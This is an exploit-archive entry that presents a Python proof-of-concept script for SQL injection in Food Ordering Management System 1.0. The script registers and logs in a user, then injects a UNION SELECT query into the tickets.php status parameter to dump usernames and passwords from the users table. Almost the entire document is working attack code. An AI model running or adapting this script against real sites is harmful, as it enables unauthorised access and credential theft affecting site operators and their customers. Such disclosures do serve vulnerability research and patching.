Food Ordering Management System 1.0 SQL Injection

Food Ordering Management System version 1.0 suffers from a remote SQL injection vulnerability.


SHA-256 | 1be2c696b62c411f0a88c3819a1d4653e0f042e7aa59018ccd5596555ca02a4b

# Exploit Title: Food Ordering Management System - SQL Injection
# Google Dork: N/A
# Date: 2022-9-27
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15689/food-ordering-management-system-php-and-mysql-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/foms.zip
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0

#/usr/bin/python3

import requests
import os
import sys
import time
import random
from bs4 import BeautifulSoup

# clean screen
os.system("cls")
os.system("clear")

logo = '''
##################################################################
# #
# SQL injection (Food Ordering Management System) #
# #
##################################################################
'''
print(logo)

url = str(input("Enter website url => "))
username = str(input("Enter Username => : "))
name = ("test123456")
password = ("test123456")
phone = ("4511233199")
number = ("1234567891000000")
cvv = ("444")

req = requests.Session()

regsiter_page = (url+"/foms/routers/register-router.php")
regsiter = {'username':username,'name':name,'password':password,'phone':phone,'number':number,'cvv':cvv}
req_regsiter = req.post(regsiter_page,data=regsiter)
print("[+] Regsiter Successfully")

login = {'username':username,'password':password}
login_page = (url+"/foms/routers/router.php")
req_login = req.post(login_page,data=login)
print("[+] Login Successfully")

sql = req.get(url+"/foms/tickets.php?status=Open' union select 1,2,username,4,password,6,7,8 from users-- -")
text = sql.text
soup = BeautifulSoup(text,"html.parser")

print("[+] SQL Injction Get Users and Password from table Users")
for link in soup.findAll(True, {'class':['task-cat light-blue', 'collections-title']}):
time.sleep(0.2)
print(link.get)

Related Posts